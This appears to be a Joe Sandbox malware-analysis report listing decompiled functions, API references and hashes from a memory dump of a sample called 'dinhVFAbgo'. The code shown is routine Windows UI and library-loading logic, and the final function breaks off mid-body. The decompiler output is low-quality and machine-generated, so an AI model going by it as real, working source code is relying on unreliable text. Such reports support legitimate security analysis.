Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: BeginBufferedPaint$uxtheme.dll
API String ID: 2061474489-1632326970
Opcode ID: 4447ab45a39170b2262e69f7b3f6de00bf4886c691794f9bcbf8c54a617c31dc
Instruction ID: 50b3e50d185641bf4426247f52827b2e5856e8d24cbb869d0a538f588f9163ba
Opcode Fuzzy Hash: 4447ab45a39170b2262e69f7b3f6de00bf4886c691794f9bcbf8c54a617c31dc
Instruction Fuzzy Hash: E8F01D3554831AAFCB119FA2AC498DA7F79AF18B517108061FD66B2220D730C954AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CBCEFE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CBCEFE(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t12;

				_t5 =  *0xe87030; // 0x0
				if(_t5 != 0) {
					__imp__DecodePointer(_t5);
					_t12 = _t5;
					L4:
					if(_t12 == 0) {
						L6:
						return 0x80004005;
					}
					 *0xe17a64(_a4, _a8, _a12, _a16);
					return  *_t12();
				}
				_t9 = GetModuleHandleW(L"shell32.dll");
				if(_t9 == 0) {
					goto L6;
				}
				_t10 = GetProcAddress(_t9, "SHCreateItemFromParsingName");
				_t12 = _t10;
				__imp__EncodePointer(_t12);
				 *0xe87030 = _t10;
				goto L4;
			}

0x00cbcf01
0x00cbcf09
0x00cbcf37
0x00cbcf3d
0x00cbcf3f
0x00cbcf41
0x00cbcf5b
0x00000000
0x00cbcf5b
0x00cbcf51
0x00000000
0x00cbcf57
0x00cbcf10
0x00cbcf18
0x00000000
0x00000000
0x00cbcf20
0x00cbcf26
0x00cbcf29
0x00cbcf2f
0x00000000

APIs

GetModuleHandleW.KERNEL32(shell32.dll), ref: 00CBCF10
GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00CBCF20
EncodePointer.KERNEL32(00000000), ref: 00CBCF29
DecodePointer.KERNEL32(00000000), ref: 00CBCF37

Strings

shell32.dll, xrefs: 00CBCF0B
SHCreateItemFromParsingName, xrefs: 00CBCF1A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: SHCreateItemFromParsingName$shell32.dll
API String ID: 2061474489-2320870614
Opcode ID: da0233b609ca35da7a9926d2d8b7e8ed23a177531407d5a3c5b1590e62e1cda8
Instruction ID: 10ab68ea472f33eb9371b64e0364a74dc4228e2367aadc09202bd15fbf5d8f1c
Opcode Fuzzy Hash: da0233b609ca35da7a9926d2d8b7e8ed23a177531407d5a3c5b1590e62e1cda8
Instruction Fuzzy Hash: D6F03071609216AF8B115FE2DC589EA7FBABB04B90B104061FD6AF2220D730CD149BD0

Uniqueness

Uniqueness Score: -1.00%

Function 00CBCB68 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CBCB68(intOrPtr _a4, intOrPtr _a8) {
				_Unknown_base(*)()* _t3;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t10;

				_t3 =  *0xe8702c; // 0x0
				if(_t3 != 0) {
					__imp__DecodePointer(_t3);
					_t10 = _t3;
					L4:
					if(_t10 == 0) {
						L6:
						return 0;
					}
					 *0xe17a64(_a4, _a8);
					return  *_t10();
				}
				_t7 = GetModuleHandleW(L"user32.dll");
				if(_t7 == 0) {
					goto L6;
				}
				_t8 = GetProcAddress(_t7, "ChangeWindowMessageFilter");
				_t10 = _t8;
				__imp__EncodePointer(_t10);
				 *0xe8702c = _t8;
				goto L4;
			}

0x00cbcb6b
0x00cbcb73
0x00cbcba1
0x00cbcba7
0x00cbcba9
0x00cbcbab
0x00cbcbbf
0x00000000
0x00cbcbbf
0x00cbcbb5
0x00000000
0x00cbcbbb
0x00cbcb7a
0x00cbcb82
0x00000000
0x00000000
0x00cbcb8a
0x00cbcb90
0x00cbcb93
0x00cbcb99
0x00000000

APIs

GetModuleHandleW.KERNEL32(user32.dll), ref: 00CBCB7A
GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 00CBCB8A
EncodePointer.KERNEL32(00000000), ref: 00CBCB93
DecodePointer.KERNEL32(00000000), ref: 00CBCBA1

Strings

ChangeWindowMessageFilter, xrefs: 00CBCB84
user32.dll, xrefs: 00CBCB75

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: ChangeWindowMessageFilter$user32.dll
API String ID: 2061474489-2498399450
Opcode ID: 880f2234e03e2eeab478a826662fb94dc52a44bf99ad19213af801528e55a5bd
Instruction ID: a43a498c9b345b8fef79542a0932cbc87b423a29e3cd1e84ddca9ec4c334f62f
Opcode Fuzzy Hash: 880f2234e03e2eeab478a826662fb94dc52a44bf99ad19213af801528e55a5bd
Instruction Fuzzy Hash: 14F01235949215AFCB115FB6AC49CDE7FA8EB08B517048061FC96F2220DA30C9049BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00CBCE9F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CBCE9F(intOrPtr _a4, intOrPtr _a8) {
				_Unknown_base(*)()* _t3;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t10;

				_t3 =  *0xe87044; // 0x0
				if(_t3 != 0) {
					__imp__DecodePointer(_t3);
					_t10 = _t3;
					L4:
					if(_t10 == 0) {
						L6:
						return 0x80004005;
					}
					 *0xe17a64(_a4, _a8);
					return  *_t10();
				}
				_t7 = GetModuleHandleW(L"uxtheme.dll");
				if(_t7 == 0) {
					goto L6;
				}
				_t8 = GetProcAddress(_t7, "EndBufferedPaint");
				_t10 = _t8;
				__imp__EncodePointer(_t10);
				 *0xe87044 = _t8;
				goto L4;
			}

0x00cbcea2
0x00cbceaa
0x00cbced8
0x00cbcede
0x00cbcee0
0x00cbcee2
0x00cbcef6
0x00000000
0x00cbcef6
0x00cbceec
0x00000000
0x00cbcef2
0x00cbceb1
0x00cbceb9
0x00000000
0x00000000
0x00cbcec1
0x00cbcec7
0x00cbceca
0x00cbced0
0x00000000

APIs

GetModuleHandleW.KERNEL32(uxtheme.dll), ref: 00CBCEB1
GetProcAddress.KERNEL32(00000000,EndBufferedPaint), ref: 00CBCEC1
EncodePointer.KERNEL32(00000000), ref: 00CBCECA
DecodePointer.KERNEL32(00000000), ref: 00CBCED8

Strings

EndBufferedPaint, xrefs: 00CBCEBB
uxtheme.dll, xrefs: 00CBCEAC

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: EndBufferedPaint$uxtheme.dll
API String ID: 2061474489-2993015961
Opcode ID: 6417da788cfaf9c03475e6de4fbb4eee26e84cdfb92e714ce5b94583a84cd00c
Instruction ID: a8c504fe02f667821506bd76e90a36871d8213a8ef34da33a5c7af34f4966b7e
Opcode Fuzzy Hash: 6417da788cfaf9c03475e6de4fbb4eee26e84cdfb92e714ce5b94583a84cd00c
Instruction Fuzzy Hash: 7CF08231908266EF9B201F76AC488EB7FB8AF04B907008061FD5AF6220DB30CD449B94

Uniqueness

Uniqueness Score: -1.00%

Function 00CBCABE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CBCABE() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t8;

				_t1 =  *0xe87038; // 0x0
				if(_t1 != 0) {
					__imp__DecodePointer(_t1);
					_t8 = _t1;
					goto L4;
				} else {
					_t5 = GetModuleHandleW(L"uxtheme.dll");
					if(_t5 == 0) {
						L6:
						return 0x80004005;
					} else {
						_t6 = GetProcAddress(_t5, "BufferedPaintInit");
						_t8 = _t6;
						__imp__EncodePointer(_t8);
						 *0xe87038 = _t6;
						L4:
						if(_t8 == 0) {
							goto L6;
						} else {
							 *0xe17a64();
							return  *_t8();
						}
					}
				}
			}

0x00cbcabe
0x00cbcac6
0x00cbcaf4
0x00cbcafa
0x00000000
0x00cbcac8
0x00cbcacd
0x00cbcad5
0x00cbcb0c
0x00cbcb12
0x00cbcad7
0x00cbcadd
0x00cbcae3
0x00cbcae6
0x00cbcaec
0x00cbcafc
0x00cbcafe
0x00000000
0x00cbcb00
0x00cbcb02
0x00cbcb0b
0x00cbcb0b
0x00cbcafe
0x00cbcad5

APIs

GetModuleHandleW.KERNEL32(uxtheme.dll), ref: 00CBCACD
GetProcAddress.KERNEL32(00000000,BufferedPaintInit), ref: 00CBCADD
EncodePointer.KERNEL32(00000000), ref: 00CBCAE6
DecodePointer.KERNEL32(00000000), ref: 00CBCAF4

Strings

BufferedPaintInit, xrefs: 00CBCAD7
uxtheme.dll, xrefs: 00CBCAC8

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: BufferedPaintInit$uxtheme.dll
API String ID: 2061474489-1331937065
Opcode ID: 0d6d9857078559d8a5a4593668d911640818a04bbe0e9ea9e1e482f842de3cb5
Instruction ID: 983cc0f543d039196d5de552c7a63423fbdaf8f146de39b79f15c44653e20337
Opcode Fuzzy Hash: 0d6d9857078559d8a5a4593668d911640818a04bbe0e9ea9e1e482f842de3cb5
Instruction Fuzzy Hash: 32E065316092225FCB10AF76BC495DD7AB86F44B517014061FC96F2260DB30CD499AA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CBCB13 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CBCB13() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t8;

				_t1 =  *0xe8703c; // 0x0
				if(_t1 != 0) {
					__imp__DecodePointer(_t1);
					_t8 = _t1;
					goto L4;
				} else {
					_t5 = GetModuleHandleW(L"uxtheme.dll");
					if(_t5 == 0) {
						L6:
						return 0x80004005;
					} else {
						_t6 = GetProcAddress(_t5, "BufferedPaintUnInit");
						_t8 = _t6;
						__imp__EncodePointer(_t8);
						 *0xe8703c = _t6;
						L4:
						if(_t8 == 0) {
							goto L6;
						} else {
							 *0xe17a64();
							return  *_t8();
						}
					}
				}
			}

0x00cbcb13
0x00cbcb1b
0x00cbcb49
0x00cbcb4f
0x00000000
0x00cbcb1d
0x00cbcb22
0x00cbcb2a
0x00cbcb61
0x00cbcb67
0x00cbcb2c
0x00cbcb32
0x00cbcb38
0x00cbcb3b
0x00cbcb41
0x00cbcb51
0x00cbcb53
0x00000000
0x00cbcb55
0x00cbcb57
0x00cbcb60
0x00cbcb60
0x00cbcb53
0x00cbcb2a

APIs

GetModuleHandleW.KERNEL32(uxtheme.dll), ref: 00CBCB22
GetProcAddress.KERNEL32(00000000,BufferedPaintUnInit), ref: 00CBCB32
EncodePointer.KERNEL32(00000000), ref: 00CBCB3B
DecodePointer.KERNEL32(00000000), ref: 00CBCB49

Strings

BufferedPaintUnInit, xrefs: 00CBCB2C
uxtheme.dll, xrefs: 00CBCB1D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: BufferedPaintUnInit$uxtheme.dll
API String ID: 2061474489-1501038116
Opcode ID: e12f91b17a1d8711f830ca23dcc803a5bd14be28355cdf58f397a61a30bed8c1
Instruction ID: 0d74725fbeb9ab9fb004670a8923c53383a1274b6d64b22d84e277d50c1c7179
Opcode Fuzzy Hash: e12f91b17a1d8711f830ca23dcc803a5bd14be28355cdf58f397a61a30bed8c1
Instruction Fuzzy Hash: 6AE06D31A082219FDB106F76BC5A8DE7AB4AF04F817018061FC52F3260DB24CD498BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00CAD754 Relevance: 10.5, APIs: 7, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CAD754(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t16;

				_t16 = __ecx;
				 *((intOrPtr*)(_t16 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t16 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t16 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t16 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t16 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t16 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t16 + 0x20) = _t14;
				return _t14;
			}

0x00cad757
0x00cad761
0x00cad76c
0x00cad777
0x00cad782
0x00cad78d
0x00cad798
0x00cad79b
0x00cad7a1
0x00cad7a5

APIs

GetSysColor.USER32(0000000F), ref: 00CAD759
GetSysColor.USER32(00000010), ref: 00CAD764
GetSysColor.USER32(00000014), ref: 00CAD76F
GetSysColor.USER32(00000012), ref: 00CAD77A
GetSysColor.USER32(00000006), ref: 00CAD785
GetSysColorBrush.USER32(0000000F), ref: 00CAD790
GetSysColorBrush.USER32(00000006), ref: 00CAD79B

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: cffc374870f8b2f9a108f29502f8437632610121c4f1b5df1348bfcce4e48076
Instruction ID: 58ef9fd86817c6558d73b1474a03273f248f4ad33d34f53b71c8a31324fbe46c
Opcode Fuzzy Hash: cffc374870f8b2f9a108f29502f8437632610121c4f1b5df1348bfcce4e48076
Instruction Fuzzy Hash: DDF0FE71A447509FD724AFB2AD0D7967AF0BB08B01F048D3DE2C69B990D7759045DF00

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6C41 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00CA6C41(void* __ecx) {
				void* _t1;
				_Unknown_base(*)()* _t3;
				void* _t6;

				_t6 = __ecx;
				if(__ecx == 0) {
					return _t1;
				} else {
					_t3 = GetProcAddress(GetModuleHandleA("kernel32"), "GetNativeSystemInfo");
					_push(_t6);
					if(_t3 == 0) {
						GetSystemInfo();
						return _t3;
					}
					return  *_t3();
				}
			}

0x00ca6c42
0x00ca6c46
0x00ca6c6f
0x00ca6c48
0x00ca6c59
0x00ca6c5f
0x00ca6c62
0x00ca6c68
0x00000000
0x00ca6c68
0x00ca6c67
0x00ca6c67

APIs

GetModuleHandleA.KERNEL32(kernel32,GetNativeSystemInfo,C:\DownLoad-Helper,00CA7157,?,?,?,?,?,?,00CA7ED7,0000001C,00CA654A,?,?,000000FF), ref: 00CA6C52
GetProcAddress.KERNEL32(00000000), ref: 00CA6C59
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,00CA7ED7,0000001C,00CA654A,?,?,000000FF), ref: 00CA6C68

Strings

GetNativeSystemInfo, xrefs: 00CA6C48
kernel32, xrefs: 00CA6C4D
C:\DownLoad-Helper, xrefs: 00CA6C41

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AddressHandleInfoModuleProcSystem
String ID: C:\DownLoad-Helper$GetNativeSystemInfo$kernel32
API String ID: 1167836806-1295678805
Opcode ID: 0eb09ec3b01576cfa1755ae585903419ed35176ecca7a4d6ea6494fb2cdbaabb
Instruction ID: 2ba2be75568485cb5e5413ff315f6cf0c86148381fd46a1e486168962ced873b
Opcode Fuzzy Hash: 0eb09ec3b01576cfa1755ae585903419ed35176ecca7a4d6ea6494fb2cdbaabb
Instruction Fuzzy Hash: 79D0A73640B2225F56502BE97D088DE2A3CDF49F283092042F4A1F2114CA50494142B1

Uniqueness

Uniqueness Score: -1.00%

Function 00D00663 Relevance: 9.4, APIs: 6, Instructions: 398
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00D00663(struct HDC__* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				char _v20;
				struct tagRECT _v36;
				struct tagRECT _v52;
				struct tagRECT _v68;
				struct tagRECT _v84;
				char _v128;
				signed int _v136;
				intOrPtr _v140;
				char _v144;
				intOrPtr* _v148;
				signed int _v152;
				intOrPtr* _v156;
				signed int _v160;
				long _v164;
				intOrPtr* _v168;
				intOrPtr _v172;
				char _v184;
				char* _t134;
				intOrPtr* _t135;
				signed int _t149;
				intOrPtr _t154;
				signed int _t155;
				signed int _t165;
				signed int _t174;
				intOrPtr _t178;
				signed int _t196;
				void* _t201;
				signed int _t209;
				int _t213;
				intOrPtr* _t218;
				intOrPtr* _t225;
				signed int _t238;
				intOrPtr* _t245;
				intOrPtr _t277;
				intOrPtr* _t286;
				intOrPtr* _t287;
				intOrPtr* _t290;
				intOrPtr* _t291;
				void* _t293;
				struct tagRECT* _t294;
				long _t304;
				intOrPtr _t305;
				signed int _t308;
				void* _t309;

				_t284 = __edx;
				_t222 = __ebx;
				_push(__edi);
				_push(_a4);
				_t286 = E00CEFC41(__ebx, __ecx, __edx, __edi, __esi, __eflags);
				if(_t286 == 0) {
					E00CAA4E7(__ebx, __ecx, _t286, __esi, __eflags);
					asm("int3");
					_push(0xa8);
					E00DDD55F(0xe0bf93, __ebx, _t286, __esi);
					_t287 = __ecx;
					_v156 = __ecx;
					_t298 = _a4;
					_v52.left = 0;
					_v52.top = 0;
					_v52.right = 0;
					_v52.bottom = 0;
					GetClientRect( *(__ecx + 0x20),  &_v52);
					_v36.left = 0;
					_v36.top = 0;
					_v36.right = 0;
					_v36.bottom = 0;
					GetClientRect( *(_t287 + 0x20),  &_v36);
					_push(_t287);
					_push(_a4);
					E00CD844E(__ebx,  &_v144, _t287, _a4, __eflags);
					_v8 = _v8 & 0x00000000;
					_t134 =  &_v128;
					__eflags = _v136;
					if(__eflags == 0) {
						_t134 = _v140;
					}
					_v148 = _t134;
					_t135 = E00CC1A50(_t222, _t287, _t298, __eflags);
					_v160 = _t135;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t290 = _v156;
					_t301 =  *((intOrPtr*)( *_t135 + 0x34));
					 *0xe17a64(_v148, _t290, 0);
					 *( *((intOrPtr*)( *_t135 + 0x34)))();
					__eflags =  *(_t290 + 0xc48);
					if( *(_t290 + 0xc48) == 0) {
						L38:
						E00CD8713( &_v144, _t284);
						return E00DDD50E(_t222, _t290, _t301);
					} else {
						 *0xe17a64( *((intOrPtr*)(E00CC19ED() + 0x28)));
						 *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x30))))();
						_t301 = _v148;
						E00CBA3B4(_t301, 1);
						_push(0);
						_push(0);
						_push(0);
						_t149 = E00CDE9FE(_t222, 0xe87dc0, _t284, _t290, _t301, __eflags,  &_v184);
						__eflags = _t149;
						if(_t149 == 0) {
							goto L38;
						} else {
							 *0xe17a64(E00CC19ED() + 0x11c);
							_t154 =  *((intOrPtr*)( *((intOrPtr*)( *_t301 + 0x28))))();
							_t238 =  *(_t290 + 0xc40);
							_t304 = 0;
							_v172 = _t154;
							_v152 = 0;
							_v160 = _t238;
							__eflags = _t238;
							if(_t238 != 0) {
								do {
									_v168 =  *((intOrPtr*)(E00CB29D4(_t290, _t304,  &_v160)));
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									_t290 = _v156;
									_t304 = 0;
									__eflags =  *0xe8738c - _t304; // 0x0
									if(__eflags == 0) {
										L13:
										_t209 = _v152;
										__eflags = _t209 -  *((intOrPtr*)(_t290 + 0xbf0));
										if(_t209 ==  *((intOrPtr*)(_t290 + 0xbf0))) {
											L15:
											_t277 =  *((intOrPtr*)(_t290 + 0xbec));
											__eflags = _t277 - 0xffffffff;
											if(_t277 == 0xffffffff) {
												L18:
												_v164 = 1;
											} else {
												__eflags = _t209 - _t277;
												if(_t209 == _t277) {
													goto L18;
												} else {
													goto L17;
												}
											}
										} else {
											__eflags = _t209 -  *((intOrPtr*)(_t290 + 0xbec));
											if(_t209 !=  *((intOrPtr*)(_t290 + 0xbec))) {
												goto L17;
											} else {
												goto L15;
											}
										}
									} else {
										__eflags =  *(_t290 + 0xb78);
										if( *(_t290 + 0xb78) == 0) {
											L17:
											_v164 = _t304;
										} else {
											goto L13;
										}
									}
									_v84.left = _t304;
									_v84.top = _t304;
									_v84.right = _t304;
									_v84.bottom = _t304;
									_t213 = IntersectRect( &_v84,  &_v68,  &_v52);
									__eflags = _t213;
									if(_t213 != 0) {
										 *0xe17a64(_v148,  &_v68, 0xe87dc0, 0,  *0xe8738c, _v164, 1, 1);
										 *((intOrPtr*)( *((intOrPtr*)( *_v168 + 0x18))))();
										_t304 = 0;
										__eflags = 0;
									}
									_v152 = _v152 + 1;
									__eflags = _v160;
								} while (_v160 != 0);
							}
							_t155 =  *(_t290 + 0xbf4);
							__eflags = _t155 -  *(_t290 + 0xc48);
							if(_t155 >=  *(_t290 + 0xc48)) {
								 *(_t290 + 0xbf4) =  *(_t290 + 0xbf4) | 0xffffffff;
								_t155 = _t155 | 0xffffffff;
								__eflags = _t155;
							}
							__eflags =  *0xe8738c;
							if( *0xe8738c == 0) {
								L37:
								_t290 = _v148;
								E00CBA1B1(_t290, 0);
								_t301 =  *((intOrPtr*)( *_t290 + 0x28));
								 *0xe17a64(_v172);
								 *((intOrPtr*)( *((intOrPtr*)( *_t290 + 0x28))))();
								E00CDCBFB(_t222, 0xe87dc0, _t290,  *((intOrPtr*)( *_t290 + 0x28)),  &_v184);
								goto L38;
							} else {
								__eflags = _t155;
								if(_t155 < 0) {
									L32:
									_t305 = _v148;
									goto L33;
								} else {
									__eflags =  *(_t290 + 0xb78) - _t304;
									if(__eflags != 0) {
										goto L32;
									} else {
										_t245 = _t290;
										_t165 = E00CF13CC(_t222, _t245, _t290, _t304, __eflags, _t155);
										_v152 = _t165;
										__eflags = _t165;
										if(__eflags == 0) {
											E00CAA4E7(_t222, _t245, _t290, _t304, __eflags);
											asm("int3");
											E00DDD52C(0xe0bfca, _t222, _t290, _t304);
											_t291 = _t245;
											 *0xe17a64(0, 0xc);
											_t308 =  *((intOrPtr*)( *((intOrPtr*)( *_t291 + 0x228))))();
											_v36.right = _t308;
											E00CA67E1( &_v20);
											_v8 = _v8 & 0x00000000;
											_t249 = _t291;
											_t174 = E00CB2D00(_t291,  &_v20);
											__eflags = _a12 - 2;
											if(__eflags != 0) {
												__eflags = _a12 - 1;
												if(_a12 != 1) {
													goto L47;
												} else {
													_t178 = _a4;
													goto L43;
												}
											} else {
												_t178 = E00CB27A9(_t249, _t291, __eflags,  *((intOrPtr*)(_t291 + 0x1dcc)));
												L43:
												_t174 = E00CACA6C(0xe68440, _t178);
												_v36.bottom = _t174;
												__eflags = _t174;
												if(_t174 == 0) {
													L47:
													_t309 = 0;
													__eflags = 0;
												} else {
													__eflags = _t308;
													if(_t308 != 0) {
														 *0xe17a64(_t291, 0, 0);
														 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 0x17c))))();
														_t174 = _v36.bottom;
													}
													 *0xe17a64(_t291, 1, 1, 1);
													 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 0x3b4))))();
													 *0xe17a64();
													_t225 =  *((intOrPtr*)( *((intOrPtr*)( *(_v36.bottom) + 0x3a0))))();
